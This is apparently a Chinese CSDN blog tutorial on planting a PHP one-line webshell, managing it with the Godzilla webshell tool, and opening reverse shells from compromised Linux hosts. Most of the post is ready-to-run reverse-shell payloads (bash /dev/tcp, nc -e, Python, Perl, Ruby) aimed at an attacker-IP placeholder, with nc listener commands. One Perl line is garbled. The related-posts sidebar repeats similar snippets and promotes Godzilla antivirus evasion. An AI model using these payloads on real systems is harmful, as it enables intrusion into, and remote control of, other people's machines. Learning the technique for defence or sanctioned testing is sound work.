Linux操作系统05--哥斯拉 反弹shell

最新推荐文章于 2024-06-04 23:27:03 发布
最新推荐文章于 2024-06-04 23:27:03 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: Linux 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/121563984
版权

哥斯拉

1.在 /var/www/html下编写一句话木马

 2.启动哥斯拉

3.目标>添加 在URL中输入木马网址,有效载荷、加密器选择php

 

 4.添加

 5.目标访问后,鼠标点击,右键即可查看受害者主机信息

反弹shell

什么是反弹shell?

  反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。

为什么要反弹shell?

通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?

有如下情况:

1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。

2.目标机器的ip动态改变,你不能持续控制。

3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。

4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

bash

在攻击主机上执行端口监听:

nc -lvvp port                               //port 为攻击主机端口号,并且此端口号没有被占用

在目标主机上执行:

bash -i >& /dev/tcp/攻击主机ip/port 0>&1                                   //port 为攻击主机端口号

nc(netcat)反弹

在攻击主机上执行端口监听:

nc -lvvp port                               //port 为攻击主机端口号,并且此端口号没有被占用

在目标主机上执行:

nc -e /bin/bash 攻击主机ip port

 python

在攻击主机上执行端口监听:

nc -lvvp port                               //port 为攻击主机端口号,并且此端口号没有被占用

在目标主机上执行:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Perl

方法一

perl -e 'use perl -e 'use Socket;$i="攻击机ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

方法二:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"攻击机ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

 Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("攻击机ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Z_l123
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
「渗透」:一句话木马反弹shell的思路
binaxin的博客
10-06 2156
前提:现在情况是已经上传了一句话木马,可以执行命令如:ls,pwd,whoami等;问题在于,不管用python、bash还是perl都反弹不了,偷不了懒,就上msf把。 http://target-ip/where/muma/path/are/1587808279743_shell.jsp?pwd=admin&cmd=pwd /u01/oracle/user_projects/domains/base_domain http://target-ip/where/muma/path/are/158.
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1346
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
【免杀】-哥斯拉魔改(入门)
最新发布
qq_55349490的博客
06-04 1391
我们都知道哥斯拉默认生成的shell是很容易被安全软件检测出来的。所以我们需要修改shell生成逻辑,以达到免杀。除了修改指纹外,我们还需要修改数据包的加密方式,以及魔改生成的shell以实现免杀的效果。我们知道,哥斯拉强大之处就在于它的插件功能。插件我们也可以尝试自己开放插件。分析多个流量包可以发现哥斯拉有3个强特征。尝试搜索关键词搜索不到,发现是。
Simple python reverse shell
abg49988的博客
08-22 144
import base64,sys; import socket,struct s=socket.socket(2,socket.SOCK_STREAM) s.connect(('Attack's IP address',ListenerPort)) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d...
河马php一句话木马,网络入侵溯源跟踪:Redis反弹Shell
weixin_29315091的博客
03-10 430
*本文作者:6265113,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。背景介绍:近期客服的妹子来找我说,客户服务器被恶意上传了大量的非法页面,客户要求三天内必须确认漏洞并提出修复方案,作为伪粉丝的我正在听某某女神唱歌,突然被打断一种莫名的惆怅在心理慢慢升起,赶紧去洗了一把脸开始干活拉,理一理思路先。分析思路:1、非法页面所属用户是谁 ,上传时间是什么时候?2、拥有什么权限可以上传非法...
一句话反弹shell
whatday的专栏
10-25 2244
1.bash反弹 攻击机监听端口 netcat: nc -nvlp 4444 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i >& /dev/tcp/攻击机ip/攻击机port 0>&amp...
强大的webshell管理工具-哥斯拉
12-27
它的主要功能包括Webshell的扫描、分析、管理、清除等,且具有跨平台的特性,通过Java运行环境可轻松在不同操作系统上使用。对于那些需要监控和控制Webshell活动的用户,哥斯拉无疑是一个值得考虑的工具。
chrome浏览器vue-devtools插件v6.4.1
12-12
在这个例子中,解压后的文件夹名为"shell-chrome"。 5. 回到Chrome的扩展程序页面,点击“加载已解压的扩展程序”,然后在弹出的文件选择器中,导航至你刚刚解压的"shell-chrome"文件夹,点击“选择文件夹”。 6. ...
Godzilla-t00ls.jar
09-01
众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是@BeichenDream决定公开他所开发的一款shell权限管理工具,名为“哥斯拉”。...
哥斯拉4.0.1.rar
03-05
哥斯拉,好用的用后门软件
哥斯拉 火爆电影 新标签页 高清壁纸 主题-crx插件
04-07
每次打开新标签时都会获得《哥斯拉》不同的高清壁纸。这个新主题除此以外还包括天气,时间,记事本,时钟等其他你想要的强大功能。 《哥斯拉》(Godzilla)是一部由传奇影业与华纳兄弟影业公司合拍,英国导演加里斯...
Reverse-Shell-with-autorun:在python上实现的反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
04-13
带自动运行的反向外壳 在python上实现的反向shell,包括服务器,客户端和自动运行代码。 从服务器在后台控制客户端PC命令行
HTTP-Reverse-Shell:Python中的HTTP反向Shell
05-22
HTTP反向外壳 这是用Python编程的HTTP Reverse Shell。 它用于建立从客户端到服务器端的反向HTTP连接。 先决条件 Python 用法 在客户端上传输客户端程序 在服务器端传输服务器程序 运行服务器端程序以开始侦听 运行客户端程序 建立连接 贡献者
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
linux udp反弹shell脚本,Linux UDP反弹shell脚本
weixin_42148975的博客
05-08 568
* 无端口 * 成功启动后无残余文件 * 一般情况下没有UDP单包512字节的问题。当然你要是执行奇葩的命令我也没办法 * 非交互式shell,也就是说,你不能用回车来写多行命令。这个问题不是不能解决,而是如果解决这个问题,会造成另外一个我不能忍受的问题。而且反* 无端口* 成功启动后无残余文件* 一般情况下没有UDP单包512字节的问题。当然你要是执行奇葩的命令我也没办法* 非交互式shell,...
反弹shell
m0_63510587的博客
11-26 266
反弹shell,是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port #port 为攻击机的端口号,并此端口未被占用 一、在目标主机上执行: bash -i >& /dev/tcp/0.0.0.0/port 0>&1 #0.0.0....
python 反弹shell,加了UDP
weixin_34349320的博客
03-20 228
2019独角兽企业重金招聘Python工程师标准>>> ...
Socket的TCP、UDP连接学习以及实现远程shell反弹
weujie
05-08 572
Socket 学习的视频:https://www.bilibili.com/video/BV1UJ411M7tx?p=2 TCP连接:可靠的、收发数据前 需要建立连接,三次握手。 UDP:不可靠的,不需要建立连接 创建套接字 socket.socket(family[,type[,port]) family 可使用AF_UNIX 或者AF_INET AF_INET 使用IPV4 协议 AF_INET6 使用ipv6协议 type 类型,可以是面向连接还是非连接的 . SOCK_STREAM
c++ protobuf-2.5.0
08-13
对于 C++,使用 Protobuf 2.5.0 的步骤如下: 1. 下载和安装 Protobuf 2.5.0: - 前往 Protobuf 的 GitHub 仓库:https://github.com/protocolbuffers/protobuf/releases/tag/v2.5.0 - 根据你的操作系统和需求,下载适合的版本。 - 按照官方文档中的指示,安装 Protobuf。 2. 定义消息类型: - 使用 Protocol Buffers 的语法在 .proto 文件中定义数据结构和字段。 3. 编写 .proto 文件: - 创建一个 .proto 文件,将消息类型的定义保存在其中。 - 例如,创建一个名为 `person.proto` 的文件,包含以下内容: ``` syntax = "proto2"; package mypackage; message Person { required string name = 1; required int32 age = 2; optional string email = 3; } ``` 4. 生成 C++ 代码: - 使用 Protobuf 的编译器将 .proto 文件编译成 C++ 代码。 - 打开命令行终端,导航到包含 .proto 文件的目录,并执行以下命令: ``` protoc -I=<proto文件所在目录> --cpp_out=<生成代码的目标目录> <proto文件名>.proto ``` 这将生成一个或多个 .pb.h 和 .pb.cc 文件,包含了用于序列化和反序列化消息的 C++ 代码。 5. 编写 C++ 应用程序: - 在你的 C++ 项目中,包含生成的 .pb.h 文件,并使用其中定义的消息类型和函数来序列化和反序列化消息。 - 例如,使用生成的代码来创建和操作 Person 消息: ```cpp #include "person.pb.h" // 创建 Person 消息对象 mypackage::Person person; person.set_name("John"); person.set_age(25); person.set_email("john@example.com"); // 序列化消息 std::string serialized_data = person.SerializeAsString(); // 反序列化消息 mypackage::Person deserialized_person; deserialized_person.ParseFromString(serialized_data); // 访问消息字段 std::string name = deserialized_person.name(); int32_t age = deserialized_person.age(); std::string email = deserialized_person.email(); ``` 这是一个简单的示例,展示了如何在 C++ 中使用 Protobuf 2.5.0。根据你的需求,可能还需要了解更多 Protobuf 2 的高级功能和用法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值